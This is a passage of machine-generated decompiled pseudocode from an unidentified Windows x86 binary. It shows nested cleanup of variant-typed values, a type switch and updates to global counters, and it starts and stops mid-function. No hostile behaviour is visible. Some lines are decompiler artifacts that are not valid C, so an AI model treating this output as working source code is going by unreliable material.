                                  																_t1158 =  *((intOrPtr*)( *_t1733 + 4));
                                  																__eflags =  *((char*)(_t1158 + _t1733 + 0xd));
                                  																_t1159 = _t1158 + _t1733 + 4;
                                  																if( *((char*)(_t1158 + _t1733 + 0xd)) != 0) {
                                  																	_t1777 =  *( *(_t1159 + 4) + 0x38);
                                  																} else {
                                  																	_t1777 =  *(_t1159 + 4);
                                  																}
                                  																_t1403 = _a12;
                                  																__eflags = _t1403 - _t1777;
                                  																if(_t1403 == _t1777) {
                                  																	L166:
                                  																	_t1453 =  *_t1733;
                                  																	_t1618 =  *((intOrPtr*)( *_t1733 + 4));
                                  																	__eflags =  *((char*)(_t1618 + _t1733 + 0xd));
                                  																	_t1000 =  *((intOrPtr*)(_t1618 + _t1733 + 8));
                                  																	_t1771 = _t1618 + _t1733 + 4;
                                  																	if( *((char*)(_t1618 + _t1733 + 0xd)) != 0) {
                                  																		_t1000 =  *((intOrPtr*)(_t1000 + 0x38));
                                  																	}
                                  																	__eflags =  *((char*)(_t1000 + 0x18));
                                  																	if( *((char*)(_t1000 + 0x18)) != 0) {
                                  																		_t1002 = E00403CC0(_t1771);
                                  																		_t1453 =  *((intOrPtr*)(_t1002 + 0x14));
                                  																		_v80 =  *((intOrPtr*)(_t1002 + 0x14));
                                  																	}
                                  																	__eflags =  *((char*)(_t1771 + 9));
                                  																	if( *((char*)(_t1771 + 9)) != 0) {
                                  																		_t1003 =  *((intOrPtr*)( *((intOrPtr*)(_t1771 + 4)) + 0x38));
                                  																	} else {
                                  																		_t1003 =  *((intOrPtr*)(_t1771 + 4));
                                  																	}
                                  																	__eflags =  *((char*)(_t1003 + 0x30));
                                  																	if( *((char*)(_t1003 + 0x30)) != 0) {
                                  																		E00408E80( &_v68, _t1453, E00403CC0(_t1771) + 0x20);
                                  																	}
                                  																	_t1396 = _a4;
                                  																	_t1454 =  *((intOrPtr*)( *_t1396 + 4));
                                  																	__eflags =  *((char*)(_t1454 + _t1396 + 0xd));
                                  																	_t1734 = _t1454 + _t1396 + 4;
                                  																	if( *((char*)(_t1454 + _t1396 + 0xd)) != 0) {
                                  																		_t1009 =  *(_t1734 + 4);
                                  																		_t1771 =  *(_t1009 + 0x38);
                                  																		__eflags = _t1009;
                                  																		if(_t1009 != 0) {
                                  																			E0044CCF1(_t1009);
                                  																		}
                                  																		 *(_t1734 + 4) = _t1771;
                                  																		 *((char*)(_t1734 + 9)) = 0;
                                  																	}
                                  																	__eflags =  *((char*)(_t1734 + 8));
                                  																	if( *((char*)(_t1734 + 8)) != 0) {
                                  																		 *((char*)(_t1734 + 9)) = 1;
                                  																		goto L190;
                                  																	} else {
                                  																		_t1771 =  *(_t1734 + 4);
                                  																		_v156 =  *((intOrPtr*)(_t1771 + 0x38));
                                  																		__eflags = _t1771;
                                  																		if(_t1771 == 0) {
                                  																			L189:
                                  																			 *(_t1734 + 4) = _v156;
                                  																			 *((char*)(_t1734 + 9)) = 0;
                                  																			L190:
                                  																			 *_t1734 =  *_t1734 - 1;
                                  																			_t1011 =  *((intOrPtr*)( *_t1396 + 4));
                                  																			_t1455 =  *((intOrPtr*)(_t1011 + _t1396 + 8));
                                  																			_t1012 = _t1011 + _t1396;
                                  																			__eflags =  *((char*)(_t1012 + 0xd));
                                  																			if( *((char*)(_t1012 + 0xd)) != 0) {
                                  																				_t1455 =  *((intOrPtr*)(_t1455 + 0x38));
                                  																			}
                                  																			 *((intOrPtr*)(_t1455 + 0x14)) = _v80;
                                  																			__eflags =  *((char*)(_t1012 + 0xd));
                                  																			_t1013 =  *((intOrPtr*)(_t1012 + 8));
                                  																			if( *((char*)(_t1012 + 0xd)) != 0) {
                                  																				_t1013 =  *((intOrPtr*)(_t1013 + 0x38));
                                  																			}
                                  																			 *((char*)(_t1013 + 0x18)) = 0;
                                  																			_t1015 =  *((intOrPtr*)( *_t1396 + 4)) + _t1396;
                                  																			__eflags =  *((char*)(_t1015 + 0xd));
                                  																			_v156 = _t1015;
                                  																			if( *((char*)(_t1015 + 0xd)) != 0) {
                                  																				_t1016 =  *((intOrPtr*)( *((intOrPtr*)(_t1015 + 8)) + 0x38));
                                  																			} else {
                                  																				_t1016 =  *((intOrPtr*)(_t1015 + 8));
                                  																			}
                                  																			_t406 = _t1016 + 0x20; // 0x21
                                  																			_t1397 = _t406;
                                  																			__eflags = _t1397 -  &_v68;
                                  																			if(_t1397 ==  &_v68) {
                                  																				L204:
                                  																				_t1735 = _v124;
                                  																				goto L205;
                                  																			} else {
                                  																				_t1109 =  *(_t1397 + 0xc);
                                  																				__eflags = _t1109;
                                  																				if(_t1109 != 0) {
                                  																					E004431AD(_t1109);
                                  																					 *(_t1397 + 0xc) = 0;
                                  																				}
                                  																				_t1111 =  *((intOrPtr*)(_t1397 + 8));
                                  																				__eflags = _t1111 - 8;
                                  																				if(_t1111 == 8) {
                                  																					_t1474 =  *_t1397;
                                  																					__eflags = _t1474;
                                  																					if(_t1474 == 0) {
                                  																						goto L197;
                                  																					}
                                  																					__imp__#9(_t1474);
                                  																					_push( *_t1397);
                                  																					E004111DC();
                                  																					_t1809 = _t1809 + 4;
                                  																					goto L201;
                                  																				} else {
                                  																					L197:
                                  																					__eflags = _t1111 - 0xa;
                                  																					if(_t1111 == 0xa) {
                                  																						_t1112 =  *_t1397;
                                  																						__eflags = _t1112;
                                  																						if(_t1112 != 0) {
                                  																							E0044318E(_t1112);
                                  																						}
                                  																					} else {
                                  																						__eflags = _t1111 - 5;
                                  																						if(_t1111 == 5) {
                                  																							E0040E270(_t1397, _t1771);
                                  																						} else {
                                  																							__eflags = _t1111 - 0xb;
                                  																							if(_t1111 == 0xb) {
                                  																								_push( *((intOrPtr*)( *_t1397 + 4)));
                                  																								E004111DC();
                                  																								_push( *_t1397);
                                  																								E004111DC();
                                  																								_t1809 = _t1809 + 8;
                                  																							} else {
                                  																								__eflags = _t1111 - 0xc;
                                  																								if(_t1111 == 0xc) {
                                  																									_t1123 =  *_t1397;
                                  																									__eflags = _t1123;
                                  																									if(_t1123 != 0) {
                                  																										E0044B3D9(_t1123);
                                  																									}
                                  																								}
                                  																							}
                                  																						}
                                  																					}
                                  																					L201:
                                  																					_t1113 = _v60;
                                  																					 *_t1397 = 0;
                                  																					 *((intOrPtr*)(_t1397 + 8)) = _t1113;
                                  																					__eflags = _t1113 - 1;
                                  																					if(_t1113 != 1) {
                                  																						_t1114 = _t1113 - 1;
                                  																						__eflags = _t1114 - 0xb;
                                  																						if(__eflags > 0) {
                                  																							goto L204;
                                  																						}
                                  																						switch( *((intOrPtr*)(_t1114 * 4 +  &M0042AF0E))) {
                                  																							case 0:
                                  																								goto L202;
                                  																							case 1:
                                  																								 *_t1397 = _v68;
                                  																								 *((intOrPtr*)(_t1397 + 4)) = _v64;
                                  																								goto L204;
                                  																							case 2:
                                  																								__fp0 = _v68;
                                  																								 *__ebx = _v68;
                                  																								goto L204;
                                  																							case 3:
                                  																								_push(0x10);
                                  																								__eax = E004115D7(__edi, __esi, __eflags);
                                  																								__esp = __esp + 4;
                                  																								__eflags = __eax;
                                  																								if(__eax == 0) {
                                  																									__eax = 0;
                                  																									__ebx[3] = 0;
                                  																								} else {
                                  																									__ecx = _v56;
                                  																									__edx =  *__ecx;
                                  																									 *__eax =  *__ecx;
                                  																									__edx =  *(__ecx + 4);
                                  																									 *(__eax + 4) =  *(__ecx + 4);
                                  																									__edx =  *(__ecx + 8);
                                  																									 *(__eax + 8) =  *(__ecx + 8);
                                  																									__ecx =  *(__ecx + 0xc);
                                  																									 *(__eax + 0xc) = __ecx;
                                  																									 *__ecx =  *__ecx + 1;
                                  																									__ebx[3] = __eax;
                                  																								}
                                  																								goto L204;
                                  																							case 4:
                                  																								_push(0x214);
                                  																								__eax = E004115D7(__edi, __esi, __eflags);
                                  																								__esp = __esp + 4;
                                  																								__eflags = __eax;
                                  																								if(__eax == 0) {
                                  																									__eax = 0;
                                  																									__eflags = 0;
                                  																								} else {
                                  																									__esi = _v68;
                                  																									__ecx = 0x85;
                                  																									__edi = __eax;
                                  																									__eax = memcpy(__eax, __esi, 0x85 << 2);
                                  																									__esi + __ecx = __esi + __ecx + __ecx;
                                  																									__ecx = 0;
                                  																								}
                                  																								__edi = _v124;
                                  																								 *__ebx = __eax;
                                  																								__eflags =  *(__eax + 4);
                                  																								if( *(__eax + 4) != 0) {
                                  																									__eax =  *(__eax + 4);
                                  																									 *__eax =  *__eax + 1;
                                  																								}
                                  																								L205:
                                  																								_t1018 = _v156;
                                  																								__eflags =  *((char*)(_t1018 + 0xd));
                                  																								if( *((char*)(_t1018 + 0xd)) != 0) {
                                  																									_t1019 =  *((intOrPtr*)( *((intOrPtr*)(_t1018 + 8)) + 0x38));
                                  																								} else {
                                  																									_t1019 =  *((intOrPtr*)(_t1018 + 8));
                                  																								}
                                  																								 *((char*)(_t1019 + 0x30)) = 0;
                                  																								__eflags =  *0x4a7f3d;
                                  																								if( *0x4a7f3d != 0) {
                                  																									_t1020 =  *0x4a7f38; // 0x0
                                  																									_t1771 =  *(_t1020 + 8);
                                  																									E0046FE90(_t1397, _t1735, _t1020);
                                  																									_t1458 =  *(_t1020 + 8);
                                  																									 *0x4a7f38 = _t1458;
                                  																									 *0x4a7f3d = 0;
                                  																								} else {
                                  																									_t1458 =  *0x4a7f38; // 0x0
                                  																								}
                                  																								__eflags =  *0x4a7f3c;
                                  																								if( *0x4a7f3c != 0) {
                                  																									_t1398 = _v128;
                                  																									 *0x4a7f3d = 1;
                                  																									goto L229;
                                  																								} else {
                                  																									_t1771 =  *_t1458;
                                  																									_v160 = _t1458[2];
                                  																									_v156 = _t1458;
                                  																									__eflags = _t1771;
                                  																									if(_t1771 == 0) {
                                  																										L228:
                                  																										_t1398 = _v128;
                                  																										_push(_v156);
                                  																										E004111DC();
                                  																										_t1809 = _t1809 + 4;
                                  																										 *0x4a7f38 = _v160;
                                  																										 *0x4a7f3d = 0;
                                  																										L229:
                                  																										 *0x4a7f34 =  *0x4a7f34 - 1;
                                  																										 *((intOrPtr*)(_a4 + 0x148)) = _v8;
                                  																										_t1023 = _v56;
                                  																										__eflags = _t1023;
                                  																										if(_t1023 != 0) {
                                  																											E004431AD(_t1023);
                                  																											_v60 = 0;
                                  																										}
                                  																										_t1025 = _v60;
                                  																										__eflags = _t1025 - 8;
                                  																										if(_t1025 == 8) {
                                  																											_t1772 = _v68;
                                  																											__eflags = _t1772;
                                  																											if(_t1772 != 0) {
                                  																												_push(_t1772);
                                  																												__imp__#9();
                                  																												_push(_t1772);
                                  																												E004111DC();
                                  																												_t1809 = _t1809 + 4;
                                  																											}
                                  																										} else {
                                  																											__eflags = _t1025 - 0xa;
                                  																											if(_t1025 == 0xa) {
                                  																												_t1073 = _v68;
                                  																												__eflags = _t1073;
                                  																												if(_t1073 != 0) {
                                  																													E0044318E(_t1073);
                                  																												}
                                  																											} else {
                                  																												__eflags = _t1025 - 5;
                                  																												if(_t1025 == 5) {
                                  																													E0040E270( &_v68, _t1771);
                                  																												} else {
                                  																													__eflags = _t1025 - 0xb;
                                  																													if(_t1025 == 0xb) {
                                  																														_t1776 = _v68;
                                  																														_push( *((intOrPtr*)(_t1776 + 4)));
                                  																														E004111DC();
                                  																														_push(_t1776);
                                  																														E004111DC();
                                  																														_t1809 = _t1809 + 8;
                                  																													} else {
                                  																														__eflags = _t1025 - 0xc;
                                  																														if(_t1025 == 0xc) {
                                  																															_t1079 = _v68;
                                  																															__eflags = _t1079;
                                  																															if(_t1079 != 0) {
                                  																																E0044B3D9(_t1079);
                                  																															}
                                  																														}
                                  																													}
                                  																												}
                                  																											}
                                  																										}
                                  																										_t1026 = _v88;
                                  																										_t1773 = _v92;
                                  																										_t1460 = 0;
                                  																										_v60 = 1;
                                  																										_v68 = 0;
                                  																										__eflags = _t1026;
                                  																										if(_t1026 != 0) {
                                  																											E004431AD(_t1026);
                                  																											_v92 = 0;
                                  																											_t1623 = 1;
                                  																											_t1460 = 0;
                                  																										}
                                  																										__eflags = _t1773 - 8;
                                  																										if(_t1773 == 8) {
                                  																											__eflags = _v100 - _t1460;
                                  																											if(_v100 != _t1460) {
                                  																												_t1773 = _v100;
                                  																												_push(_t1773);
                                  																												__imp__#9();
                                  																												_push(_t1773);
                                  																												E004111DC();
                                  																												_t1809 = _t1809 + 4;
                                  																												_t1623 = 1;
                                  																												_t1460 = 0;
                                  																											}
                                  																										} else {
                                  																											__eflags = _t1773 - 0xa;
                                  																											if(_t1773 == 0xa) {
                                  																												__eflags = _v100 - _t1460;
                                  																												if(_v100 != _t1460) {
                                  																													E0044318E(_v100);
                                  																													_t1623 = 1;
                                  																													_t1460 = 0;
                                  																												}
                                  																											} else {
                                  																												__eflags = _t1773 - 5;
                                  																												if(_t1773 == 5) {
                                  																													E0040E270( &_v100, _t1773);
                                  																													_t1623 = 1;
                                  																													_t1460 = 0;
                                  																												} else {
                                  																													__eflags = _t1773 - 0xb;
                                  																													if(_t1773 == 0xb) {
                                  																														_t1773 = _v100;
                                  																														_push( *((intOrPtr*)(_t1773 + 4)));
                                  																														E004111DC();
                                  																														_push(_t1773);
                                  																														E004111DC();
                                  																														_t1809 = _t1809 + 8;
                                  																														_t1623 = 1;
                                  																														_t1460 = 0;
                                  																													} else {
                                  																														__eflags = _t1773 - 0xc;
                                  																														if(_t1773 == 0xc) {
                                  																															__eflags = _v100 - _t1460;
                                  																															if(_v100 != _t1460) {
                                  																																E0044B3D9(_v100);
                                  																																_t1623 = 1;
                                  																																_t1460 = 0;
                                  																															}
                                  																														}
                                  																													}
                                  																												}
                                  																											}
                                  																										}
                                  																										_t1028 = _v184;
                                  																										__eflags = _t1028 - _t1460;
                                  																										if(_t1028 != _t1460) {
                                  																											E004431AD(_t1028);
                                  																											_v188 = 0;
                                  																											_t1623 = 1;
                                  																											_t1460 = 0;
                                  																										}
                                  																										_t1030 = _v188;
                                  																										__eflags = _t1030 - 8;
                                  																										if(_t1030 == 8) {
                                  																											_t1031 = _v196;
                                  																											__eflags = _t1031 - _t1460;
                                  																											if(_t1031 != _t1460) {
                                  																												_push(_t1031);
                                  																												__imp__#9();
                                  																												_push(_v200);
                                  																												E004111DC();
                                  																												_t1809 = _t1809 + 4;
                                  																												_t1623 = 1;
                                  																												_t1460 = 0;
                                  																											}
                                  																										} else {
                                  																											__eflags = _t1030 - 0xa;
                                  																											if(_t1030 == 0xa) {
                                  																												_t1055 = _v196;
                                  																												__eflags = _t1055 - _t1460;
                                  																												if(_t1055 != _t1460) {
                                  																													E0044318E(_t1055);
                                  																													_t1623 = 1;
                                  																													_t1460 = 0;
                                  																												}
                                  																											} else {
                                  																												__eflags = _t1030 - 5;
                                  																												if(_t1030 == 5) {
                                  																													E0040E270( &_v196, _t1773);
                                  																													_t1623 = 1;
                                  																													_t1460 = 0;
                                  																												} else {
                                  																													__eflags = _t1030 - 0xb;
                                  																													if(_t1030 == 0xb) {
                                  																														_push( *(_v196 + 4));
                                  																														E004111DC();
                                  																														_push(_v196);
                                  																														E004111DC();
                                  																														_t1809 = _t1809 + 8;
                                  																														_t1623 = 1;
                                  																														_t1460 = 0;
                                  																													} else {
                                  																														__eflags = _t1030 - 0xc;
                                  																														if(_t1030 == 0xc) {
                                  																															_t1062 = _v196;
                                  																															__eflags = _t1062 - _t1460;
                                  																															if(_t1062 != _t1460) {
                                  																																E0044B3D9(_t1062);
                                  																																_t1623 = 1;
                                  																																_t1460 = 0;
                                  																															}
                                  																														}
                                  																													}
                                  																												}
                                  																											}
                                  																										}
                                  																										_v188 = _t1623;
                                  																										_v196 = _t1460;
                                  																										__eflags = _t1735 - _t1460;
                                  																										if(_t1735 <= _t1460) {
                                  																											L250:
                                  																											_push(_v128);
                                  																											E004111DC();
                                  																											_t1811 = _t1809 + 4;
                                  																											__eflags = _v172;
                                  																											if(_v172 <= 0) {
                                  																												L263:
                                  																												_push(_v176);
                                  																												E004111DC();
                                  																												_t946 = 0;
                                  																												__eflags = 0;
                                  																												goto L264;
                                  																											} else {
                                  																												_t1399 = 0;
                                  																												__eflags = 0;
                                  																												do {
                                  																													_t1774 =  *(_v176 + _t1399 * 4);
                                  																													__eflags = _t1774;
                                  																													if(_t1774 == 0) {
                                  																														goto L262;
                                  																													}
                                  																													_t1736 =  *(_t1774 + 0xc);
                                  																													__eflags = _t1736;
                                  																													if(_t1736 != 0) {
                                  																														 *( *(_t1736 + 0xc)) =  *( *(_t1736 + 0xc)) - 1;
                                  																														__eflags =  *( *(_t1736 + 0xc));
                                  																														if( *( *(_t1736 + 0xc)) == 0) {
                                  																															_push( *_t1736);
                                  																															E004111DC();
                                  																															_push( *(_t1736 + 0xc));
                                  																															E004111DC();
                                  																															_t1811 = _t1811 + 8;
                                  																														}
                                  																														_push(_t1736);
                                  																														E004111DC();
                                  																														_t1811 = _t1811 + 4;
                                  																														 *(_t1774 + 0xc) = 0;
                                  																													}
                                  																													_t1035 =  *(_t1774 + 8);
                                  																													__eflags = _t1035 - 8;
                                  																													if(_t1035 == 8) {
                                  																														_t1461 =  *_t1774;
                                  																														__eflags = _t1461;
                                  																														if(_t1461 == 0) {
                                  																															goto L257;
                                  																														}
                                  																														_push(_t1461);
                                  																														__imp__#9();
                                  																														_push( *_t1774);
                                  																														E004111DC();
                                  																														_t1811 = _t1811 + 4;
                                  																														goto L261;
                                  																													} else {
                                  																														L257:
                                  																														__eflags = _t1035 - 0xa;
                                  																														if(_t1035 == 0xa) {
                                  																															_t1036 =  *_t1774;
                                  																															__eflags = _t1036;
                                  																															if(_t1036 != 0) {
                                  																																E0044318E(_t1036);
                                  																															}
                                  																														} else {
                                  																															__eflags = _t1035 - 5;
                                  																															if(_t1035 == 5) {
                                  																																E0040E270(_t1774, _t1774);
                                  																															} else {
                                  																																__eflags = _t1035 - 0xb;
                                  																																if(_t1035 == 0xb) {
                                  																																	_push( *((intOrPtr*)( *_t1774 + 4)));
                                  																																	E004111DC();
                                  																																	_push( *_t1774);
                                  																																	E004111DC();
                                  																																	_t1811 = _t1811 + 8;
                                  																																} else {
                                  																																	__eflags = _t1035 - 0xc;
                                  																																	if(_t1035 == 0xc) {
                                  																																		_t1044 =  *_t1774;
                                  																																		__eflags = _t1044;
                                  																																		if(_t1044 != 0) {
                                  																																			E0044B3D9(_t1044);
                                  																																		}
                                  																																	}
                                  																																}
                                  																															}
                                  																														}
                                  																														L261:
                                  																														_push(_t1774);
                                  																														 *(_t1774 + 8) = 1;
                                  																														 *_t1774 = 0;
                                  																														E004111DC();
                                  																														_t1811 = _t1811 + 4;
                                  																													}
                                  																													L262:
                                  																													_t1399 = _t1399 + 1;
                                  																													__eflags = _t1399 - _v172;
                                  																												} while (_t1399 < _v172);
                                  																												goto L263;
                                  																											}
                                  																										} else {
                                  																											_t1775 = 0;
                                  																											__eflags = 0;
                                  																											do {
                                  																												_push( *((intOrPtr*)(_t1398 + _t1775 * 4)));
                                  																												E004111DC();
                                  																												_t1775 = _t1775 + 1;
                                  																												_t1809 = _t1809 + 4;
                                  																												__eflags = _t1775 - _t1735;
                                  																											} while (_t1775 < _t1735);
                                  																											goto L250;
                                  																										}
                                  																									} else {
                                  																										_t1082 =  *(_t1771 + 0x18);
                                  																										_t1400 = _t1458;
                                  																										__eflags = _t1082;
                                  																										if(_t1082 != 0) {
                                  																											E0040B400(_t1400, _t1458, _t1735, _t1082);
                                  																										}
                                  																										_t1083 =  *(_t1771 + 0x1c);
                                  																										__eflags = _t1083;
                                  																										if(_t1083 != 0) {
                                  																											E0040B400(_t1400, _t1400, _t1735, _t1083);
                                  																										}
                                  																										__eflags =  *((char*)(_t1771 + 0x10));
                                  																										if( *((char*)(_t1771 + 0x10)) != 0) {
                                  																											L225:
                                  																											 *( *(_t1771 + 0xc)) =  *( *(_t1771 + 0xc)) - 1;
                                  																											__eflags =  *( *(_t1771 + 0xc));
                                  																											if( *( *(_t1771 + 0xc)) == 0) {
                                  																												_push( *_t1771);
                                  																												E004111DC();
                                  																												_push( *(_t1771 + 0xc));
                                  																												E004111DC();
                                  																												_t1809 = _t1809 + 8;
                                  																											}
                                  																											_push(_t1771);
                                  																											E004111DC();
                                  																											_t1735 = _v124;
                                  																											_t1809 = _t1809 + 4;
                                  																											goto L228;
                                  																										} else {
                                  																											_t1401 =  *(_t1771 + 0x14);
                                  																											__eflags = _t1401;
                                  																											if(_t1401 == 0) {
                                  																												goto L225;
                                  																											}
                                  																											_t1737 =  *(_t1401 + 0xc);
                                  																											__eflags = _t1737;
                                  																											if(_t1737 != 0) {
                                  																												 *( *(_t1737 + 0xc)) =  *( *(_t1737 + 0xc)) - 1;
                                  																												__eflags =  *( *(_t1737 + 0xc));
                                  																												if( *( *(_t1737 + 0xc)) == 0) {
                                  																													_push( *_t1737);
                                  																													E004111DC();
                                  																													_push( *(_t1737 + 0xc));
                                  																													E004111DC();
                                  																													_t1809 = _t1809 + 8;
                                  																												}
                                  																												_push(_t1737);
                                  																												E004111DC();
                                  																												_t1809 = _t1809 + 4;
                                  																												 *(_t1401 + 0xc) = 0;
                                  																											}
                                  																											_t1090 =  *(_t1401 + 8);
                                  																											__eflags = _t1090 - 8;
                                  																											if(_t1090 == 8) {
                                  																												_t1471 =  *_t1401;
                                  																												__eflags = _t1471;
                                  																												if(_t1471 == 0) {
                                  																													goto L220;
                                  																												}
                                  																												_push(_t1471);
                                  																												__imp__#9();
                                  																												_push( *_t1401);
                                  																												E004111DC();
                                  																												_t1809 = _t1809 + 4;
                                  																												goto L224;
                                  																											} else {
                                  																												L220:
                                  																												__eflags = _t1090 - 0xa;
                                  																												if(_t1090 == 0xa) {
                                  																													_t1091 =  *_t1401;
                                  																													__eflags = _t1091;
                                  																													if(_t1091 != 0) {
                                  																														E0044318E(_t1091);
                                  																													}
                                  																												} else {
                                  																													__eflags = _t1090 - 5;
                                  																													if(_t1090 == 5) {
                                  																														E0040E270(_t1401, _t1771);
                                  																													} else {
                                  																														__eflags = _t1090 - 0xb;
                                  																														if(_t1090 == 0xb) {
                                  																															_push( *((intOrPtr*)( *_t1401 + 4)));
                                  																															E004111DC();
                                  																															_push( *_t1401);
                                  																															E004111DC();
                                  																															_t1809 = _t1809 + 8;
                                  																														} else {
                                  																															__eflags = _t1090 - 0xc;
                                  																															if(_t1090 == 0xc) {
                                  																																_t1099 =  *_t1401;
                                  																																__eflags = _t1099;
                                  																																if(_t1099 != 0) {
                                  																																	E0044B3D9(_t1099);
                                  																																}
                                  																															}
                                  																														}
                                  																													}
                                  																												}
                                  																												L224:
                                  																												_push(_t1401);
                                  																												 *(_t1401 + 8) = 1;
                                  																												 *_t1401 = 0;
                                  																												E004111DC();
                                  																												_t1809 = _t1809 + 4;
                                  																												goto L225;
                                  																											}
                                  																										}
                                  																									}
                                  																								}
                                  																							case 5:
                                  																								__ecx = _v68;
                                  																								 *__ebx = __ecx;
                                  																								goto L204;
                                  																							case 6:
                                  																								__esi = _v68;
                                  																								__eflags = __esi;
                                  																								if(__eflags != 0) {
                                  																									_push(0x10);
                                  																									__eax = E004115D7(__edi, __esi, __eflags);
                                  																									__esp = __esp + 4;
                                  																									_push(__eax);
                                  																									 *__ebx = __eax;
                                  																									__imp__#8();
                                  																									__edx =  *__ebx;
                                  																									_push(__esi);
                                  																									_push( *__ebx);
                                  																									__imp__#10();
                                  																									__eflags = __eax;
                                  																									if(__eax < 0) {
                                  																										__eax =  *__ebx;
                                  																										_push( *__ebx);
                                  																										__imp__#9();
                                  																										__ecx =  *__ebx;
                                  																										_push( *__ebx);
                                  																										__eax = E004111DC();
                                  																										__esp = __esp + 4;
                                  																										 *__ebx = 0;
                                  																									}
                                  																								}
                                  																								goto L204;
                                  																							case 7:
                                  																								 *__ebx = _v68;
                                  																								goto L204;
                                  																							case 8:
                                  																								_push(0x18);
                                  																								__eax = E004115D7(__edi, __esi, __eflags);
                                  																								__esp = __esp + 4;
                                  																								__eflags = __eax;
                                  																								if(__eax == 0) {
                                  																									goto L567;
                                  																								}
                                  																								__ecx = _v68;
                                  																								__eax = E0044B8A3(__eax, _v68);
                                  																								goto L203;
                                  																							case 9:
                                  																								_push(8);
                                  																								__eax = E004115D7(__edi, __esi, __eflags);
                                  																								__esi = _v68;
                                  																								 *__ebx = __eax;
                                  																								__edx =  *__esi;
                                  																								 *__eax =  *__esi;
                                  																								__eax =  *__ebx;
                                  																								__eax =  *( *__ebx);
                                  																								__esp = __esp + 4;
                                  																								__eflags = __eax;
                                  																								if(__eflags == 0) {
                                  																									_push(1);
                                  																									__eax = E004115D7(__edi, __esi, __eflags);
                                  																									__edx =  *__ebx;
                                  																									 *( *__ebx + 4) = __eax;
                                  																									__eax =  *__ebx;
                                  																									__ecx =  *(__eax + 4);
                                  																									__esp = __esp + 4;
                                  																									 *__ecx = 0;
                                  																								} else {
                                  																									_push(__eax);
                                  																									__eax = E004115D7(__edi, __esi, __eflags);
                                  																									__ecx =  *__ebx;
                                  																									 *( *__ebx + 4) = __eax;
                                  																									__ebx =  *__ebx;
                                  																									__edx =  *__ebx;
                                  																									__eax =  *(__esi + 4);
                                  																									__ecx = __ebx[1];
                                  																									__esp = __esp + 4;
                                  																									__eax = E00410E60(__ebx[1],  *(__esi + 4),  *__ebx);
                                  																								}
                                  																								goto L204;
                                  																							case 0xa:
                                  																								_push(0x14);
                                  																								__eax = E004115D7(__edi, __esi, __eflags);
                                  																								__esp = __esp + 4;
                                  																								__eflags = __eax;
                                  																								if(__eax == 0) {
                                  																									L567:
                                  																									__eax = 0;
                                  																									L203:
                                  																									 *_t1397 = _t1116;
                                  																									goto L204;
                                  																								}
                                  																								__edx = _v68;
                                  																								__eax = E00470870(__eax, _v68);
                                  																								goto L203;
                                  																						}
                                  																					}
                                  																					L202:
                                  																					_t1116 = _v68;
                                  																					goto L203;
                                  																				}
                                  																			}
                                  																		}
                                  																		_t1126 =  *(_t1771 + 0x2c);
                                  																		__eflags = _t1126;
                                  																		if(_t1126 != 0) {
                                  																			E004431AD(_t1126);
                                  																			 *(_t1771 + 0x2c) = 0;
                                  																		}
                                  																		_t1128 =  *(_t1771 + 0x28);
                                  																		__eflags = _t1128 - 8;
                                  																		if(_t1128 == 8) {
                                  																			_t1477 =  *(_t1771 + 0x20);
                                  																			__eflags = _t1477;
                                  																			if(_t1477 == 0) {
                                  																				goto L176;
                                  																			}
                                  																			__imp__#9(_t1477);
                                  																			_push( *(_t1771 + 0x20));
                                  																			E004111DC();
                                  																			_t1809 = _t1809 + 4;
                                  																			goto L180;
                                  																		} else {
                                  																			L176:
                                  																			__eflags = _t1128 - 0xa;
                                  																			if(_t1128 == 0xa) {
                                  																				_t1129 =  *(_t1771 + 0x20);
                                  																				__eflags = _t1129;
                                  																				if(_t1129 != 0) {
                                  																					E0044318E(_t1129);
                                  																				}
                                  																			} else {
                                  																				__eflags = _t1128 - 5;
                                  																				if(_t1128 == 5) {
                                  																					_t851 = _t1771 + 0x20; // 0x67
                                  																					E0040E270(_t851, _t1771);
                                  																				} else {
                                  																					__eflags = _t1128 - 0xb;
                                  																					if(_t1128 == 0xb) {
                                  																						_push( *((intOrPtr*)( *(_t1771 + 0x20) + 4)));
                                  																						E004111DC();
                                  																						_push( *(_t1771 + 0x20));
                                  																						E004111DC();
                                  																						_t1809 = _t1809 + 8;
                                  																					} else {
                                  																						__eflags = _t1128 - 0xc;
                                  																						if(_t1128 == 0xc) {
                                  																							_t1153 =  *(_t1771 + 0x20);
                                  																							__eflags = _t1153;
                                  																							if(_t1153 != 0) {
                                  																								E0044B3D9(_t1153);
                                  																							}
                                  																						}
                                  																					}
                                  																				}
                                  																			}
                                  																			L180:
                                  																			 *(_t1771 + 0x28) = 1;
                                  																			 *(_t1771 + 0x20) = 0;
                                  																			_t1402 =  *(_t1771 + 0xc);
                                  																			__eflags = _t1402;
                                  																			if(_t1402 != 0) {
                                  																				 *( *(_t1402 + 0xc)) =  *( *(_t1402 + 0xc)) - 1;
                                  																				__eflags =  *( *(_t1402 + 0xc));
                                  																				if( *( *(_t1402 + 0xc)) == 0) {
                                  																					_push( *_t1402);
                                  																					E004111DC();
                                  																					_push( *(_t1402 + 0xc));
                                  																					E004111DC();
                                  																					_t1809 = _t1809 + 8;
                                  																				}
                                  																				_push(_t1402);
                                  																				E004111DC();
                                  																				_t1809 = _t1809 + 4;
                                  																				 *(_t1771 + 0xc) = 0;
                                  																			}
                                  																			_t1130 =  *(_t1771 + 8);
                                  																			__eflags = _t1130 - 8;
                                  																			if(_t1130 == 8) {
                                  																				_t1478 =  *_t1771;
                                  																				__eflags = _t1478;
                                  																				if(_t1478 == 0) {
                                  																					goto L184;
                                  																				}
                                  																				__imp__#9(_t1478);
                                  																				_push( *_t1771);
                                  																				E004111DC();
                                  																				_t1809 = _t1809 + 4;
                                  																				goto L188;
                                  																			} else {
                                  																				L184:
                                  																				__eflags = _t1130 - 0xa;
                                  																				if(_t1130 == 0xa) {
                                  																					_t1131 =  *_t1771;
                                  																					__eflags = _t1131;
                                  																					if(_t1131 != 0) {
                                  																						E0044318E(_t1131);
                                  																					}
                                  																				} else {
                                  																					__eflags = _t1130 - 5;
                                  																					if(_t1130 == 5) {
                                  																						E0040E270(_t1771, _t1771);
                                  																					} else {
                                  																						__eflags = _t1130 - 0xb;
                                  																						if(_t1130 == 0xb) {
                                  																							_push( *((intOrPtr*)( *_t1771 + 4)));
                                  																							E004111DC();
                                  																							_push( *_t1771);
                                  																							E004111DC();
                                  																							_t1809 = _t1809 + 8;
                                  																						} else {
                                  																							__eflags = _t1130 - 0xc;
                                  																							if(_t1130 == 0xc) {
                                  																								_t1139 =  *_t1771;
                                  																								__eflags = _t1139;
                                  																								if(_t1139 != 0) {
                                  																									E0044B3D9(_t1139);
                                  																								}
                                  																							}
                                  																						}
